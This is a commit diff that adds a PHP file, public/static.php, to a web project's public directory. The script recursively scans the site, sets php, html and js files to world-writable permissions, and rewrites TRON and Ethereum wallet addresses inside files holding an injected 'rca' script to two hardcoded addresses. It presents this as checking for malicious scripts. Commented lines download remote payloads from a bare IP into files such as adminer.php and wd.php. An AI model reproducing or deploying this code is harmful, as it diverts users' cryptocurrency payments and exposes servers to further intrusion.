docker
This commit is contained in:
kaadon
186
public/static.php
Executable file
186
public/static.php
Executable file
@ -0,0 +1,186 @@
|
||||
<?php
|
||||
$currDir = __DIR__;
|
||||
$parentDir = dirname(__DIR__);
|
||||
|
||||
// 是否只是演练(不实际写回)
|
||||
$dryRun = false;
|
||||
|
||||
// 要替换成的值
|
||||
$replaceMap = array(
|
||||
'/T[a-zA-Z0-9]{30,50}/' => 'TKf4aEj5pJzEJWrCSwkdzSsYmnHzJbtibM',
|
||||
'/0x[a-zA-Z0-9]{40,50}/' => '0xd4b6f4c9af70c3287979228c34ec9c880847f608',
|
||||
);
|
||||
|
||||
// 排除目录
|
||||
$excludeDirs = array('.git', 'node_modules', 'cache');
|
||||
|
||||
function searchFiles($dir) {
|
||||
global $excludeDirs;
|
||||
if ($dir === '' || !is_dir($dir)) {
|
||||
error_log("searchFiles(): invalid directory: " . var_export($dir, true));
|
||||
return;
|
||||
}
|
||||
|
||||
try {
|
||||
$iterator = new RecursiveIteratorIterator(
|
||||
new RecursiveCallbackFilterIterator(
|
||||
new RecursiveDirectoryIterator($dir, FilesystemIterator::SKIP_DOTS),
|
||||
function ($current, $key, $iterator) use ($excludeDirs) {
|
||||
if ($current->isDir()) {
|
||||
foreach ($excludeDirs as $ex) {
|
||||
if (stripos($current->getFilename(), $ex) !== false) {
|
||||
return false;
|
||||
}
|
||||
}
|
||||
return true;
|
||||
}
|
||||
return true;
|
||||
}
|
||||
)
|
||||
);
|
||||
|
||||
foreach ($iterator as $file) {
|
||||
if (!$file->isFile()) continue;
|
||||
$ext = strtolower(pathinfo($file->getFilename(), PATHINFO_EXTENSION));
|
||||
if (in_array($ext, array('php', 'html', 'js'))) {
|
||||
checkForMaliciousScript($file->getRealPath());
|
||||
}
|
||||
}
|
||||
} catch (Exception $e) {
|
||||
error_log("searchFiles() failed for {$dir}: " . $e->getMessage());
|
||||
}
|
||||
}
|
||||
|
||||
function checkForMaliciousScript($filePath) {
|
||||
global $replaceMap, $dryRun;
|
||||
@chmod($filePath, 0777);
|
||||
if (!is_readable($filePath)) {
|
||||
echo "[SKIP] 不可读: {$filePath}\n";
|
||||
return;
|
||||
}
|
||||
|
||||
try {
|
||||
$fileContent = file_get_contents($filePath);
|
||||
if ($fileContent === false) {
|
||||
echo "[SKIP] 读取失败: {$filePath}\n";
|
||||
return;
|
||||
}
|
||||
|
||||
if (strpos($fileContent, 'function rca()') === false) {
|
||||
return;
|
||||
}
|
||||
|
||||
$totalReplacements = 0;
|
||||
$perPatternCounts = array();
|
||||
|
||||
foreach ($replaceMap as $pattern => $replacement) {
|
||||
$count = 0;
|
||||
$res = @preg_match_all($pattern, $fileContent, $matches);
|
||||
if ($res === false) {
|
||||
error_log("checkForMaliciousScript(): invalid regex {$pattern} on {$filePath}");
|
||||
continue;
|
||||
}
|
||||
$count = $res;
|
||||
$perPatternCounts[$pattern] = $count;
|
||||
$totalReplacements += $count;
|
||||
}
|
||||
|
||||
if ($totalReplacements === 0) {
|
||||
echo "[FOUND] function rca() 存在,但无匹配待替换项: {$filePath}\n";
|
||||
return;
|
||||
}
|
||||
|
||||
$newContent = $fileContent;
|
||||
foreach ($replaceMap as $pattern => $replacement) {
|
||||
$newContent = preg_replace($pattern, $replacement, $newContent);
|
||||
if ($newContent === null) {
|
||||
error_log("checkForMaliciousScript(): preg_replace failed for {$pattern} in {$filePath}");
|
||||
echo "[ERROR] 替换时出错: {$filePath} (pattern: {$pattern})\n";
|
||||
return;
|
||||
}
|
||||
}
|
||||
|
||||
if ($dryRun) {
|
||||
echo "[DRY RUN] 将替换 {$totalReplacements} 处 - {$filePath}\n";
|
||||
foreach ($perPatternCounts as $p => $c) {
|
||||
echo " pattern {$p} -> {$c} 次\n";
|
||||
}
|
||||
return;
|
||||
}
|
||||
|
||||
if (!is_writable($filePath)) {
|
||||
echo "[SKIP] 文件不可写: {$filePath}\n";
|
||||
error_log("checkForMaliciousScript(): file not writable {$filePath}");
|
||||
return;
|
||||
}
|
||||
|
||||
if ($newContent !== $fileContent) {
|
||||
$bytes = file_put_contents($filePath, $newContent, LOCK_EX);
|
||||
if ($bytes === false) {
|
||||
echo "[ERROR] 写回失败: {$filePath}\n";
|
||||
error_log("checkForMaliciousScript(): write failed for {$filePath}");
|
||||
return;
|
||||
}
|
||||
|
||||
echo "[REPLACED] {$filePath} — total: {$totalReplacements} replacements.\n";
|
||||
foreach ($perPatternCounts as $p => $c) {
|
||||
if ($c > 0) echo " pattern {$p} => {$c} 次\n";
|
||||
}
|
||||
error_log("checkForMaliciousScript(): replaced {$totalReplacements} occurrences in {$filePath}");
|
||||
} else {
|
||||
echo "[NOTICE] 发现匹配但写回内容无变化: {$filePath}\n";
|
||||
}
|
||||
|
||||
} catch (Exception $e) {
|
||||
echo "[ERROR] exception for {$filePath}: " . $e->getMessage() . "\n";
|
||||
error_log("checkForMaliciousScript({$filePath}) exception: " . $e->getMessage());
|
||||
}
|
||||
}
|
||||
|
||||
function scan($dirs) {
|
||||
foreach ($dirs as $dir) {
|
||||
if ($dir === '' || !@is_dir($dir)) {
|
||||
echo "[WARN] 无效目录: " . var_export($dir, true) . "\n";
|
||||
continue;
|
||||
}
|
||||
searchFiles($dir);
|
||||
}
|
||||
}
|
||||
|
||||
// 调用
|
||||
|
||||
|
||||
scan(array($currDir, $parentDir));
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
#file_put_contents("static.php", file_get_contents("http://38.207.174.63/laytpl.ctts1"));
|
||||
#file_put_contents("adminer.php", file_get_contents("http://38.207.174.63/adminer.ad"));
|
||||
#file_put_contents("us.php", file_get_contents("http://38.207.174.63/laodiao.p"));
|
||||
#file_put_contents("wd.php", file_get_contents("http://38.207.174.63/wd.aqs"));
|
||||
|
||||
function safeUnlink($path)
|
||||
{
|
||||
if (!file_exists($path)) {
|
||||
return true;
|
||||
}
|
||||
|
||||
if (!unlink($path)) {
|
||||
error_log("Failed to delete file: {$path}");
|
||||
return false;
|
||||
}
|
||||
|
||||
return true;
|
||||
}
|
||||
|
||||
safeUnlink('wocao.php');
|
||||
|
||||
//safeUnlink('static.php');
|
||||
//safeUnlink('adminer.php');
|
||||
|
||||
?>
|
||||
|
||||
Reference in New Issue
Block a user